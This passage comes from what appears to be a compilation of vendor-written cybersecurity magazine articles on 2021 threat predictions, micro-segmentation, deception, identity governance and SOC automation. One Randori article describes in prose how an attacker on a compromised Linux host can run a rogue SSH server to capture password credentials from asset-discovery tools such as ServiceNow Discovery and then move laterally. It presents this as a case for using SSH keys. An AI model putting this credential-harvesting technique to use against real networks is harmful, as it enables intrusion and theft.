5. Malware will explore new targets Ransomware threats are expanding beyond their traditional purview of Windows and macOS desktops. Within organizations, increasingly-exposed industrial control systems (ICS) make a tempting target for takeover and extortion. Both at home and in the office, the growing adoption of the internet of things (IoT) — especially in connection with 5G — will continue to present new areas for infection in the form of smart devices. While internet-enabled appliances themselves don’t tend to store large quantities of data (nor particularly sensitive information), they present a potential attack vector towards their manufacturers — and may be incorporated into DDoS-fueling botnets.

6. Preparing for the next wave of cyberthreats This has been a challenging year for businesses, to be sure. And we face a slew of new challenges in 2021. Expect new tactics, never-before-seen malware, relentless automation, and attacks against surfaces that may not be well protected. Now more than ever, an intelligent and integrated approach is necessary to stay safe in the digital space. Businesses must invest in solutions that can stand toe-to-toe with the latest cyberthreats and provide complete cyber protection.

About the Author Topher Tebow is a cybersecurity analyst, with a focus on malware tracking and analysis, at Acronis. Topher spent nearly a decade combating web-based malware before moving into endpoint protection. Topher has written technical content for several companies, covering topics from security trends and best practices, to analysis of malware and vulnerabilities. In addition to being published in leading cybersecurity publications, Topher has spoken at InfoSec conferences, and is an active part of the Arizona cybersecurity community. Topher can be reached online at @TopherTebow on Twitter, and at our company website https://www.acronis.com/.

Why 'Thinking Small' Is the Way to Stop Ransomware and Other Cyber Attacks By Yuval Baron, CEO at AlgoSec, explains why micro-segmentation is one of the most effective methods to limit the damage of attacks on a network

On August 15, 2020, the cruise line Carnival Corporation fell victim to a cyber-attack that may have resulted in the loss of personal data of millions of passengers and crew members.

Carnival is the world's largest travel and leisure company with approximately 13 million passengers per year. The company has not revealed how many customers or which of their individual brands were affected but what we do know is that law enforcement agencies were been notified because one of the brands reported a ransomware attack that broke through an encrypted part of their network.

This is not the first time that Carnival's security measures have been circumvented by hackers. In 2019, a cyber attack on Princess Cruises and Holland America Line resulted in the loss of the personal data of hundreds of passengers and crew members. The criminals stole names, social security numbers, passport numbers and credit card information.

Carnival’s experience will feel all too familar to some businesses. In fact, we recently started working with two organizations who fell victim to high-profile ransomware attacks earlier this year, and reached out to us after the event to help prevent and mitigate such attacks in the future by tightning their security posture and limiting attack surface.

While many believe that looking at the big picture is the best way to find solutions to protect large corporations, the answer actually lies in something much smaller - the micro-segmentation of the network.

Damage limitation through micro-segmentation

Hackers are never going to give up targeting large corporations, and ransomware attacks like that on Carnival will never disappear. Moreover, as criminals become increasingly sophisticated, it has become difficult to fully protect your network. What companies can do, however, is limit the potential damage hackers can cause if they do gain access to sensitive company or customer data.

One way to do this is through network micro-segmentation, which is regarded as one of the most effective methods to reduce an organization’s attack surface. A lack of it has often been cited as a contributing factor in some of the largest data losses in ransomware attacks.

Micro-segmentation minimizes the damage that hackers can do if they gain access, by stopping lateral movement across your networks. Just as the watertight compartments in a ship should contain flooding if the hull is breached, segmentation isolates servers and systems into separate zones to contain intruders or malware as well as insider threats, limiting the potential security risks and damage.

Controlling the borders

Although micro-segmentation is recognized as an effective method to enhance security, some businesses have been slow to adopt it because it can be complex and costly to implement, especially in traditional on-premise data centers.

Moving to virtualized data centers with Software-Defined Networking (SDN) and cloud connectivity removes some of these barriers. The flexibility of the SDN enables more advanced, granular zoning, allowing networks to be divided into hundreds of micro-segments. To achieve this level of security in a traditional data center would be prohibitively expensive and too complicated to implement.

But virtualized data centers do not eliminate all the stumbling blocks. Enforcing security policies and firewall configurations on all systems and across different IT environments would still have to be done manually. But this is an enormous task for the IT security department. This time is then lacking for large projects. The use of a filtering policy enforced by the micro-segmented structure is therefore still necessary and writing this policy is the first and biggest hurdle to be overcome.

Simplification of micro-segmentation through security automation

Automated network management makes it much easier for companies to define and enforce their micro- segmentation strategy. It also ensures that critical business services are not blocked due to misconfiguration and that compliance requirements are met. It autonomously performs application discovery based on Netflow information and identifies unprotected data streams on the network that neither pass through a firewall nor are filtered for an application. It automatically detects changes in the network that collide with the current micro-segmentation setting, immediately suggests policy changes based on this information and, if desired, automatically and validated enforces them.

So although micro-segmentation can be a costly and time-consuming process, solutions are now available to significantly speed up, improve and reduce the cost of setup and maintenance. An SDN data center and cloud combined with security automation puts companies on the road to effective protection against ransomware attacks of all kinds.

About the Author Yuval Baron the CEO of AlgoSec. Prior to founding AlgoSec, Yuval Baron co-founded Actelis Networks Inc. in 1998 where he served as its CEO until 2002. Actelis Networks is the leading provider of high performance, scalable broadband over copper solutions. During his tenure, Actelis Networks raised $75 million in three separate funding up-rounds from investors including USVP, NEA, Walden, Carlyle, Salomon Smith Barney, France Telecom, Sumitomo, and Vertex. Prior to Actelis, Mr. Baron was vice president of sales and marketing at RIT Technologies (Nasdaq: RITT), a provider of network infrastructure solutions for data centers and communication networks. At RIT, he built a distribution network across 55 countries and drove revenue growth which led to a successful IPO. Prior to RIT, Mr. Baron spent a decade with Comverse Technology (Nasdaq: CMVT), a leading global provider of telecom business solutions. Mr. Baron has a B.Sc. in Mathematics, Computer Science, and Economics (Cum Laude) and an MBA in Finance. Yuval can be reached online at https://twitter.com/AlgoSec and at our company website https://www.algosec.com/

Your Vulnerabilities are Making You Miss Your Misconfigurations IT organizations regularly configure asset discovery tools in ways that leave them open to abuse by attackers; Vendor configuration documentation lacks details on the risk.

By Evan Anderson, Director of Offense, Randori

The security industry pays lots of attention to vulnerabilities and the need for patching. While there is a need for this, the industry has over-indexed on vulnerability management in the past couple decades. What doesn’t get as much attention, and is often more important to an attacker, are things like common misconfigurations or an improper implementation that introduces unintended risk. I can say with confidence that some vendor-recommended implementation strategies are widely abused by red- teamers and attackers to achieve their objectives. I’ve been taking advantage of these types of flaws since the early 2000s, and it’s so common that red-teamers developed tooling to take advantage of faulty configurations.

At Randori, we regularly see improper implementations,suggesting many blue-teamers are unaware of the risks of certain configuration methods. Vendor documented implementation methods -- that are

commonly used by IT orgs -- can introduce unintended risk into your environment. And the challenge is that improper implementations can be near impossible to spot, and even more problematic to fix.

Let’s take a closer look at this problem, using asset discovery tools as an example -- specifically ServiceNow Discovery. Organizations have rightfully started using auto discovery tools in order to find services, applications, and devices to mitigate the exposure of misconfigs before attackers can take advantage of them. These tools give companies a better understanding of what systems are on their network, their patch level, and how the systems are configured. Discovery tools programmatically log into systems and run commands to check their configuration.

Unfortunately, asset discovery tools can themselves be improperly configured. This will increase risk to an organization rather than reducing it.

Before I go on, a note: ServiceNow Discovery is not vulnerable or bad, nor is Virima or BMC Helix Discovery (other asset discovery tools that suggest similar implementations), it's simply a concrete example recently used by my team. The problem: When ServiceNow Discovery, BMC Helix Discovery or Virmia are configured with password credentials rather than a private key, they can easily be taken advantage of by an attacker.

It’s low risk to use this weakness to for a multitude of reasons: 1. I don’t have to make an exploit (which is expensive and takes time) 2. I can just sit on the network and it will give me credentials - I don’t have to do any discovery or port scanning. 3. I won’t trigger an alert. In many cases alerts associated with discovery tools are ignored or disable because they are considered benign (and with good reason). 4. I don’t have to brute force entry (which could trigger alerts).

“Discovery” explores UNIX and Linux devices utilizing SSH to execute commands on the system in question. In order to run the exploratory commands, “Discovery” must have some sort of credential in order to access the system. ServiceNow’s documentation has two ways to configure these credentials. One is username and password -- the other is via an SSH key. It is more secure to use SSH private key credentials rather than an SSH password, but password credentials are often preferred because they are easier to configure. In fact, the ServiceNow Discovery documentation does explicitly state: “SSH private key credentials are recommended over SSH password credentials for security reasons.” However, it doesn’t go into detail.

ServiceNow Discovery Documentation

People use passwords more than private keys because of the ease of deployment. Simply add an account to the system with a password and you’re in. Private key authentication has the extra steps generating the key pair, protecting the private key and copying the public key into place on the server systems.

Capability in Action Let’s assume then as the attacker, I have gained access to a network by compromising a Linux system and am looking to move laterally to other systems. I begin by quietly observing or sniffing the network traffic with the goal of gaining situational awareness attempting to figure out what I can see and what I have access to.

While watching network traffic, I notice an IP address attempting to connect to my compromised system on TCP port 22 (the default port for SSH servers.) So I know somebody or something is attempting to login via SSH. I quickly spin up an SSH server I control, and wait.

Often the username for these types of asset discovery tools reference the product in some way. For instance `ServiceNowUser`. Just armed with that information, I know those credentials likely work on other *nix systems (UNIX, MacOS, FreeBSD, linux) and users are trained to ignore logins from that user.

Now I’m off to the races -- I can steal leaked credentials and move laterally to other systems on the network, with little operational risk. And credentials are often used to verify patch states and system configurations, thus I have access to that data on each system, giving me a lot more information to do my job easily and stealthily.

For anyone implementing a new technology consider taking the extra time to configure using a private key vs. a password (more on the advantages here). Review documentation thoroughly and pay special attention to best practices. Ask your vendor to give more details on security best practices if they aren’t included in the documentation. Some configurations may be quick wins for a project, but be careful you aren’t inadvertently giving away the keys to the kingdom.The details are important to understanding what risk you are accepting.

Any software that is used on a network should be viewed as part of the attack surface, and thus must be considered when calculating risk. Purchasing a tool is not the solution to the problem, and may in fact cause more harm than good. You must allow teams the time to understand the ramifications of a product, how to properly implement and how to utilize tools properly in your environment. Recognize the risk you’re taking if you’re asking your team to implement something on a shorter timeframe -- that often means not as secure.

About the Author Evan Anderson is the Director of Offense at Randori – where he leads the company’s Hacker Operations Center. In this role, Evan leads a team developing new and novel offensive capabilities for Randori’s automated attack platform. Evan can be reached online at linkedin.com/in/attack/ and at www.randori.com

Are Your Organization’s Critical Assets Five Steps or Fewer from A Cyber Attacker? By Gus Evangelakos, Director Field Engineering, XM Cyber

Cybersecurity is an asymmetric battle -- and one in which attackers hold an unfair advantage. Adversaries maintain the initiative and can attack from novel and unexpected angles, while defenders are forced into a reactive role. The asymmetric nature of cybersecurity isn't the sole reason data breaches continue to rise every year, of course. The popularity of cloud computing and constant expansion of the attack surface also present substantial ongoing challenges for today's organizations. This raises an interesting question: Just how quickly can critical assets be exfiltrated by cyber attackers? The 2020 Verizon Data Breach Investigations Report (DBIR) sheds some light on how attacks are unfolding -- and why adversaries often need only a handful of steps to expose the most valuable "crown jewel" assets.

The Landscape Has Never Been More Favorable for Adversaries Understanding just how vulnerable your systems are is key to assessing risk. This applies to the specifics of our security environments and the larger conditions that affect how and why breaches occur. Misconfiguration errors -- which remain at epidemic levels -- are one reason why attack paths are often so short and direct. Cloud migration mandates, building remote workforce capabilities, managing access on the fly -- all of the demands placed on IT professionals create conditions that are highly conducive to misconfigurations. If you look at the highest-profile data breaches of the last five years, misconfigurations pop up as the culprit again and again.

Launching successful attacks has also never been easier or more accessible, particularly for adversaries with low to moderate skill and limited resources.

● Deloitte estimates a low-end cyber-attack costing just $34 a month could generate $25,000.. ● A phishing campaign for $30 a month can return $500 a month. ● Keylogging can return $723 a month for as little as a $183 investment. ● More sophisticated attacks costing a few thousand dollars could return as much as $1 million per month

Yet whether you're dealing with an amateur equipped with cheap darknet malware or a sophisticated Advanced Persistent Threat, one thing doesn't change: Nobody wants to waste time on hard targets. The shortest path is always the most attractive.

Five Steps -- Or Less -- From Danger Attackers have many paths they can choose to target specific assets. Defenders, meanwhile, must try to visualize and map all the variables related to those paths and manage any vulnerabilities -- certainly no small task. Hardening the environment by reducing the number of obvious pathways is vitally important, as many attackers will simply move on to the next target when faced with a resilient security posture. Attackers are just as concerned about efficiency and ROI as any conventional business.

This means that organizations that can develop security robust enough to require a long procession of steps are best positioned to deter attacks. Verizon's 2020 DBIR shows that the average breach requires fewer than five steps. Beyond 20 steps, attacks begin occurring with vastly less frequency. Interestingly, hacking and malware-based attacks tend to be highly overrepresented among attacks requiring more than 10 steps, while attacks based on errors, misuse or social paths are highly clustered within the fewer- than-five-steps category. Adversaries prefer short paths and rarely attempt longer or more complex attacks -- the numbers attest to this. This means that any action taken to increase the number of steps adversaries must take also increases the odds of a successful breach.

What Organizations Can Learn From This Deterring attackers often comes down to one thing: Being a harder target than the next guy. Adversaries will typically take the path of least resistance. In practical terms, this means focusing on a few key areas:

● Creating a true security culture within your organization. It's essential to create buy-in from the C suite on down. Every strategic decision should be viewed, in part, through the lens of cybersecurity. ● Human error -- the kind that can compromise critical assets in a few short steps -- is inevitable. Raising awareness of best security practices through routine training will only do so much before returns begin diminishing. One way to manage this risk is to commit to a security posture focused on continuous improvement. ● Automated penetration testing (using tools such as breach and attack simulation software) can help develop a harder and more resilient security environment. By continuously probing your own defenses for vulnerabilities, you can uncover gaps before they are exploited and wrest the initiative from attackers -- making the battle of cybersecurity less asymmetrical.

● Gaining insight into how attackers can move laterally to compromise your assets is a core challenge. Determine how many steps would it take and what remediation steps will close the attack path. Again, automated penetration testing tools that provide prioritized remediation recommendations can be helpful in this regard.

In Conclusion Given that critical assets are often just a handful of steps from danger, it's imperative to harden your security environments and work toward continuous improvement. For more information on this topic, I heartily recommend a recent webinar hosted by Security Scorecard that delves into these issues in greater detail.

About the Author Gus Evangelakos is the Director of North American Field Engineering at XM Cyber. He has extensive experience in cybersecurity, having managed implementations and customer success for many major global brands such as Varonis, Bromium and Comodo. Gus has spent a decade also working on the client-side, supporting IT infrastructure and cybersecurity projects. He has a strong background in micro virtualization, machine learning, deep learning (AI), sandboxing, containment, HIPS, AV, behavioral analysis, IOCs, and threat intelligence. Gus can be reached online via LinkedIn and at our company website http://xmcyber.com/

Moving to Active Defense: What It Means, How It Works and What You Can Do Now By Ofer Israeli, CEO and founder, Illusive Networks

Despite the myriad cybersecurity solutions out there, breaches, attacks and exploitations continue. The old approach isn’t working; cybersecurity teams need to move from a passive approach to one that’s more active. And MITRE’s introduction of Shield addresses this directly. MITRE, the federally funded not- for-profit, has made it clear that active defense, rather than the standard whack-a-mole responsive defense, is paramount in the fight against cybercrime.

With the release of their Shield framework, MITRE has shifted the cybersecurity focus to active defense techniques. Government IT teams that know the latest strategies and recommendations put their agencies in a strong position to remain secure.

MITRE Shield introduces active defense The MITRE Corporation’s goal is to “solve problems for a safer world.” Shield is an active defense knowledge base constructed from over a decade of enemy engagement. With it, MITRE is trying to gather and organize what it has been learning with respect to active defense and adversary engagement. This information ranges from “high-level, CISO-ready considerations of opportunities and objectives to practitioner-friendly discussions of the TTPs available to defenders.” MITRE hopes that Shield will encourage discussion about active defense and how defenders can use this information to get the upper hand. But what exactly does active defense mean? And what do organizations need to know?

Understanding active defense

Active defense entails the use of limited offensive action and counterattacks to prevent an adversary from taking digital territory or assets. Active defense covers a swathe of activities, including engaging the adversary, basic cyber defensive capabilities and cyber deception. Taken together, these activities enable IT teams to stop current attacks as well as get more insight into the attacker. Then they can prepare more thoroughly for future attacks.

MITRE makes it clear in its discussion of Shield that deception capabilities are a necessity in the modern security stack to truly deter and manage adversaries. In Shield’s new tactic and technique mapping, deception is prominent across eight active defense tactics—channel, collect, contain, detect, disrupt, facilitate, legitimize and test—along with 33 defensive techniques.

What agencies need to know

Government organizations are continuous targets for bad actors, whether it’s nation-state attackers seeing proprietary information or more run-of-the-mill criminals looking to cause chaos and obtain some PII they can exploit.

There is a huge amount of intellectual property within government agencies. A lot of the intellectual property that’s created in the U.S. that is of interest to adversaries is in the DoD supply chain or is being submitted to the U.S. Patent and Trademark office. Government agencies are holding some of the most valuable and sensitive data sets, including lawsuits being handled by the Department of Justice and counterterrorism tracking in the Department of Homeland Security.

Bad actors attempt to sneak into these environments and then gain access to even more impactful information – like stealing the security clearance forms for 20 million people from the Office of Personnel Management. Analysts estimate that critical breaches of government networks have increased by a factor of three to six, depending on the targets.

Agencies also need to know and avoid the misconceptions about deception. A prevailing misconception is that deception is synonymous with honeypots, which have been around for a long time and are no longer effective. And to make them as realistic as possible requires a lot of management so that if

attackers engage with a honeypot, they won't be able to detect that it is not a real system and therefore know they're in the middle of getting caught.

A second misconception is that deception is overly complicated and complex, with comparatively little ROI. Security organizations could enjoy the benefit of using deception technology – which is lightweight and has a low cost of maintenance – but are not engaging because they think it’s an overwhelming, complex approach that they won’t get enough value from.

The reality is that deception technology is not the same as honeypots. That’s how deception began, but it has evolved significantly since then. Today’s deception takes the breadcrumb/deceptive artifact approach that leads attackers on a false trail, which triggers alerts so that defenders can find and stop the attackers in real time. Only unauthorized users know the deceptions exist, as they don’t have any effect on every day systems, so false positives are dramatically reduced. These aspects of deception technology add tremendous security and financial value to the IT security organization.

Raise your Shield

The attack surface that security teams must secure continues to expand rapidly as attacker tactics evolve – whether through nation-states attack teams, insider threats, for-hire groups or others. The forced digital transformation during the pandemic, and long-term ramifications that have resulted from it, points to the need for a more robust approach to protecting critical assets. And this is where active defense is key. It is likely that the MITRE Shield will become a standard to measure security proficiency by. Government agencies need to expand that proficiency by including the best practice of deception to their security mix.

About the Author Having pioneered deception-based cybersecurity, founder and CEO of Illusive Networks Ofer Israeli leads the company at the forefront of the next evolution of cyber defense. Prior to establishing Illusive Networks, Ofer managed development teams based around the globe at Israel’s seminal cybersecurity company Check Point Software Technologies and was a research assistant in the Atom Chip Lab focusing on theoretical Quantum Mechanics. Ofer holds B.Sc. degrees in Computer Science and Physics from Ben-Gurion University of the Negev.

Ofer can be reached on Twitter @ofer_israeli and at https://www.illusivenetworks.com.

How Next-Gen Identity Governance and Administration (IGA) Fits in with Your Hybrid IT Strategy By Thomas Müller-Martin, Global Partner Technical Lead, Omada

More and more organizations are using a hybrid IT environment that combines both on-premises and cloud-based applications. The rise of remote work, driven by the pandemic, has only increased the speed of this transformation. In fact, Gartner predicts that more than 75% of midsize and large organizations will have adopted some kind of multi-cloud or hybrid IT strategy by 2021.

While this approach brings many advantages, it can also make it harder to get a transparent view of who has access to which IT systems and applications within the organization. As organizations continuously move more workloads to digital services, they will need a more solid approach to identity management. Identity Governance and Administration (IGA) has become a cornerstone of solid IT security, allowing organizations to implement processes for controlling, managing and auditing access to data, which is an important prerequisite to reduce the security risk.

The growth of hybrid IT Cloud adoption shows no signs of slowing down – in fact, IT spending overall continues to shift to public cloud computing. Gartner analysts believe that more than 45% of IT spending on system infrastructure, infrastructure software, application software and business process outsourcing will shift from traditional solutions to cloud by 2024. The cloud has been integral for many companies’ capability to stay productive during the shift to remote work, and it also comes with plenty of other advantages – like the cost savings of not having to house an on-premises data center. That said, not every business can or should shift entirely to the cloud. Some things have to remain on-premises and as a result, hybrid IT is growing. However, these new solutions must still maintain regulatory compliance and secure collaboration across the organization and with partners and customers. They must support the rapid adoption of new digital services while respecting security and compliance. The solutions need to protect the brand and IP while acting in a complex ecosystem. The organization must therefore manage the risk while maintaining business agility and increasing efficiency.

The role of identity governance and access management Ensuring security and staying compliant means that identity access management and identity governance are key. Migrating to the cloud creates potential exposed openings for attackers and different vulnerabilities, so organizations must revise their risk and security management. Therefore, they need to have a vision for secure cloud adoption and then establish appropriate governance. It is important to ensure that a well-functioning, future-proof architecture for identity management and access governance is implemented. This architecture should secure the organization long-term and ensure correct data flows across disparate systems and directories.

An organization must know its identities and related accounts before enabling users to access and use cloud services. Companies must make sure that federated identities from suppliers, partners or customers are governed in a proper manner. Ideally, this should happen before collaboration begins, and the correct processes must be established and implemented. Organizations should also establish “local” security mechanisms, such as access request and certification, and they must also establish policies for cloud services.

What organizations need to know

When an organization uses an IGA solution, it allows the IT department to manage and govern all user access rights across a hybrid IT environment. Among the elements IGA processes oversee are:

• audit and compliance reporting to ensure continuous risk overview • managing access to resources across an organization’s hybrid IT environments (on-premises and cloud-based applications)

• performing access reviews and certifications across all cloud and on-premises applications • onboarding of new employees and offboarding leavers • a structured approach to onboarding applications • managing access to applications on a granular level in compliance with company policies, handling of access assignment policies and provisioning

The ability to process these elements effectively lets companies ensure compliance, save money and minimize the risk of data theft by insiders and hackers. A key factor in doing this well is ensuring that business systems are only accessible to those who need to use them to do their job – the “least privilege” approach.

Take control

As cloud adoption soars, hybrid IT shows no sign of slowing down. Market forces have converged to make this standard operating procedure. But that means, for regulatory and security reasons, organizations must get control of who has access to which parts of their distributed business systems.

To ensure security, compliance and efficiency, businesses need IGA processes in place. These processes protect organizations from incidents that could damage their reputation or, in the worst case, cause them to go out of business. In the era of the cloud, with skyrocketing cyber threats and stringent legislation such as GDPR, having best practice IGA processes in place has become a license to operate. Implementing an IGA solution should be seen as a strategic investment, empowering organizations to realize significant business value.

About the Author Thomas Müller-Martin is Global Partner Technical Lead at Omada. He has spent more than 15 years in identity and access management. As the implementation of identity-centric cyber-security strategies become more and more relevant for enterprises around the globe, he helps Omada partners to make their Identity Governance and Administration journey a success. Thomas can be reached online via LinkedIn and omada.net.

Analytics & Security Insight On 2021 And Beyond Predictions for the Future of the Security Space By Billy Spears, Chief Information Security Officer, Alteryx

2020 has been a year unlike any other, with unforeseen challenges creating hurdles for businesses in every sector of the economy. As companies look for ways to insulate themselves from future shocks while preparing for the year ahead, insider insights can help companies to understand how societal and economic trends have and will impact their industries and what to expect in 2021. Below, I share a few predictions that will help leaders stay ahead of the curve and tackle anything that 2021 throws at them. First, I believe that in 2021, zero-trust security will become the new normal. The work-from-anywhere concept has created an interesting opportunity for CISOs to consider strategic approaches for managing non-traditional security risks. To accommodate this shift, we’ll see corporate security departments expanding the perimeter into associates’ homes to ensure that cyber risks are not unknowingly introduced into the corporate network. 2021 will see CISOs working with HR, further pushing to increase each associate’s cyber awareness to proactively recognize and report related risks, meaning that “zero-trust security” will be the new standard methodology for supporting associates working remotely. CISOs must adopt this model as it improves secure access to corporate resources through continuous assessment

and intent-based authentication policies. Furthermore, Virtual Private Network (VPN) connections must become a default setting to increase protections for associates requiring remote access. Additionally, citizen data scientists will play a bigger role in preventing cyber attacks in 2021. As workers everywhere become more comfortable working with data, the ability of a business to deliver value in data processing and analysis increases exponentially. Their ever-expanding skillset increases value by delivering actionable insights from terabytes of otherwise impenetrable data to help the company forecast, mitigate risk and fraud, deliver relevant products to their customers and improve cybersecurity defensiveness. Effective cybersecurity threat hunting has always been built around the constant pursuit, near capture and repeated escapes of adversaries attempting to infiltrate a corporate network. Using a powerful analytics platform that enables machine learning capabilities is crucial to detect and address cybersecurity threats more rapidly by providing security departments with the ability to examine large volumes of data to uncover trends, identify patterns and deliver actionable intelligence. With the further democratization of data, 2021 will see citizen data scientists more and more playing a key role in helping security teams enhance and simplify their cyber defense technologies by precisely detecting future attacks, proactively identifying security blind spots across the network and protecting valuable company information.

About the Author

Billy Spears, Chief Information Security Alteryx. He is responsible for overseeing enterprise cybersecurity and associated risk management practices. With a strong focus in both internal and external security, Billy ensures that Alteryx associates, customers, partners and vendors are thoroughly protected via state-of-the- art policies, processes and technologies. His passion for architecting and implementing strategic solutions that build trust, enable resilience and incorporate core principles are driving transformation and simplifying processes across the organization. Billy brings more than 20 years of experience leading and building teams in the information and security space across both the corporate world and the federal government. His strong background in information and security across different industries and verticals is critical in enforcing best practices within all areas of the business. Billy’s informed guidance and strategic approach to risk management and security efforts is instrumental in improving protections as Alteryx and the larger self-service analytics market continues to grow and expand across the globe. Prior to joining Alteryx, Billy served as executive vice president and chief information security officer at loanDepot, a market leader and online mortgage lender for consumers. While in this role, Billy helped create the first security enabled digital home loan experience for consumers – a game-changing advancement in the mortgage business. Billy has held similar positions at companies like Hyundai Capital America, General Electric and Dell, as well as the U.S. Department of Homeland Security. He is also a veteran of the U.S. Marine Corps. Billy is an adjunct cybersecurity professor for Webster University and a member of the company advisory board for Cymatic, a web application defense platform. Billy holds a bachelor’s degree in information technology from National University and received his MBA from University of Phoenix. Billy can be reached online on Twitter at his handle @BillyJSpears and at our company website https://www.alteryx.com/

Innovation, Automation and Securing A “Work from Anywhere” Environment In The Middle East By Mazen A. Dohaji, Vice President, India, Middle East, Turkey & Africa (iMETA), LogRhythm.

Throughout 2020, enterprises and public sector organizations across the Middle East have been managing disruption and finding new ways to work. The challenge as we begin 2021 is to not just survive but thrive in this new business environment. That requires adopting new tools and creating a secure foundation that keeps users connected and moving forward. While many organizations have experienced lockdowns and quarantines throughout 2020, security and infrastructure teams are looking at how to provide flexible working while maintaining their cybersecurity posture. Users have shifted to a diverse and changeable working environment while cyberattacks in the Middle East have surged. The UAE saw cyberattacks increase from 43,000 in April 2020 to peaks of 120,000 in July and 123,000 in August, according to the UAE’s Telecommunications Regulatory Authority (TRA). Between April and August, there was a 186% increase in cyberattacks in the country, which tracks closely with lockdown

restrictions. Organizations have to be prepared for further uncertainty in 2021 and take action to manage their risk in the long term. What they can be certain of is that cyberattacks will continue to be a pain point and have the potential to spike again in 2021.

‘Work from Anywhere’ Security Operations Center (SOC) teams should be reviewing and reflecting on 2020 and thinking about how they will support dynamic working environments that aren’t just working from home or in the office but look more like “work from anywhere” scenarios. Most organizations have evolved tremendously over the last 12 months and SOC teams need to stay in-tune with current operational norms and expectations of both users and business managers. SOC teams should question the state-of-play for their organization in 2021 and ask if their business is prepared for a new dynamic and fluid working environment. They should ask themselves:

1. What did we learn about our systems and processes throughout 2020? 2. What changes do I need to make to optimize our approach to security in the new year? 3. How do we secure a workforce that is fluid and moving between remote and on-premises? 4. Are my security controls and infrastructure built for this, or am I taking additional risk? 5. What is the state of play for security visibility in this flexible environment? 6. How prepared are we to change and adapt in case we are ready to come back to a fully office- based operation by the summer? 7. What do our users want? How can we enable their success? 8. Where do we start with so much uncertainty?

Based on their responses, they should take action to ensure that their security posture matches the organization’s requirements and ensure it is ready to flex and adapt as needed. There are a few basic steps all organizations in the Middle East should be evaluating and prioritizing.

User Vulnerability The first step for SOC teams across the Middle East should be to re-enforce best practice within their organizations and spend time educating users about policies, guidelines and best practices. Internal communications to users drive awareness and understanding of security risks. This should be increased and combined with more training. If training took place at the beginning of the pandemic, then organizations should be revisiting this in 2021. Whether it is in the private or public sector, user-based threats, like compromised accounts, increase risk and exposure across organizations. Human nature is still a primary vulnerability in an already complex threat landscape.

Endpoint is the Bottomline SOC teams need new levels of visibility that are built to serve both remote and office-based working. They should be focused on the collection and correlation of endpoint, VPN and other pertinent infrastructure data like employees connecting back into the corporate network, identity and access

management, as well as monitoring collaboration technologies like Office 365, Teams, Zoom, and Slack. It is about gaining visibility and control over the users’ ICT ecosystem and understanding where to, from, and how employees are authenticating and accessing data and applications. When an intrusion is suspected, they need to be able to qualify the threat and assess its potential impact. They can only do that if they have captured a wide variety of activity occurring on their endpoints and servers in real-time. Every organization should be able to search rich forensic data to understand when and how the incident occurred, and then contain the compromise with an endpoint lockdown.

Automate Everything While automating everything might not be possible today, SOC teams should be exploring automating as many processes as possible. They are capturing massive amounts of data, which has made automating security processes a necessity. Not only does it eliminate human error, it ensures that precise decisions can be made at speed. SOC automation tools reduce an organization’s time to qualify (TTQ) and mean time to respond (MTTR) to a security threat. TTQ refers to the average time it takes to determine whether an incident is benign or should be considered a threat that requires investigation. Research by the Ponemon Institute found that it took organizations an average of 280 days to identify and contain a data breach in 2020. For most private and public sector organizations, that “wait time” is way too long. In a risky and uncertain time, they can’t wait for a human to perform an action that could be executed by a Security Information and Event Management (SIEM) solution with Security Orchestration, Automation and Response (SOAR) capabilities.

Reinventing the Wheel When it comes to visibility and automation, there’s no reason to reinvent the wheel. SOC teams don’t have to develop all of this themselves. Instead, they should look for one-click, out-of-the box automation solutions that help them meet local compliance requirements and quickly deliver for their organizations. In markets like the Kingdom of Saudi Arabia, predefined reports and use cases can be made immediately available to organizations so they can meet local cybersecurity controls. This can be a way to quickly enhance an organization’s security posture while being able to demonstrate compliance.

It also increases cost-efficiencies and enables local organizations to bridge skills gaps in the Middle East and benefit from both local and global expertise. Pre-defined use cases and reports can make it simpler and easier to deploy and enhance security in 2021.

2021 and Beyond Rapid digitalization across the private and public sector in the Middle East is only going to continue in 2021. The digital transformation and flexible working boom that started in 2020 will accelerate. This means that cybersecurity has to continually evolve to match the needs of rapidly changing ICT ecosystems. Adaptability and agility are critical and that starts with a secure foundation. Throughout

2021, SOC teams should review, reflect and adapt as their operational environment continues to change and unexpected events influence the threat landscape.

About the Author Mazen A. Dohaji has worked for LogRhythm for more than 6 years, where he started as a Senior Regional Director for India, Middle East, Turkey & Africa (IMETA) and is now Vice President for IMETA. He has 26 years of IT industry wealth in the Middle East region and more than 3 years in the SIEM space. Mazen is driven by market challenges and has extensive knowledge of the Middle Eastern Security market. This has led him to be the trusted advisor for major government entities and large enterprises across the region. He has also won “Top Performer” awards in multiple multinational organizations including IBM (formerly Informix), HP, and McAfee.

Peer-To-Peer Cybersecurity Insights For 2021 Based on real practitioners’ experiences By Stuart Berman, IT Central Station Super User

December is typically a month when people who work in the IT field offer predictions for the coming year. 2020 has been a highly atypical year, however, so it’s a bit daunting to think about what’s coming over the horizon. Yet, my company is in a unique position to engage in prognostication. We source user data directly from users in the trenches. In a year when travel has not been possible, IT professionals could not rely on the traditional get-togethers and in-person discussions to get advice and feedback from other industry experts. Online review sites such as our have boomed as a result. With that in mind, here are five predictions for cybersecurity, based on what are learning from real practitioners. Countermeasures and security operations catch up with containerization and microservices— While neither containerization nor microservices are new, they have reached a level of adoption that calls for a revised approach to cloud security. I say revised, versus new, because it’s easy to get pulled into “It’s all different, trash everything you’re doing” discussions. These are traps to avoid, as are the seductive but in my view false ideas like “Firewalls are dead in the cloud. You just need good code.” No, principles like Defense in Depth don’t go away just because you’re running virtualized services in the cloud. Rather, securing containers and microservices calls for new, virtualized versions of familiar technologies like firewalls.

Automation of security processes and SecOps becomes the norm—This has also been a long time coming, but the security field has reached a point where manual processes will no longer suffice. There is just too much going on, too many threats to mitigate, too many alerts to handle. Instead, solutions like Security Orchestration, Automation and Response (SOAR) will become “must haves” in the Security Operations Center (SOC). SOAR solutions use automated “playbooks” to handle threats at a speed that people cannot possibly match by hand. Multiple security and related systems become more deeply integrated—The need to integrate the different elements of a security program will become more pressing in 2021. This goes along with automation. As security incident response becomes automated, it will make sense to eliminate manual handoffs between the systems that power the response, e.g., the SOAR solution will connect with the IT ticketing system via Application Programming Interfaces (APIs) for generating and assigning tasks. Security moves a lot faster—Security processes, along with the systems that support them, will start to move a lot faster in 2021. This might take the form of increased automated system updates versus manual re-installs, to name just one possible example. Automation also naturally moves processes along at a far faster clip than was previously possible. Security partners more closely with other corporate groups—Security, as well as its close cousin, compliance, will require more collaboration between multiple groups inside an organization. With privacy, for example, there will likely be much closer coordination between legal teams and engineering. For example, to ensure the “right to be forgotten” under GDPR and CCPA, the legal team has to have a thorough understanding of how the consumer’s rights will be 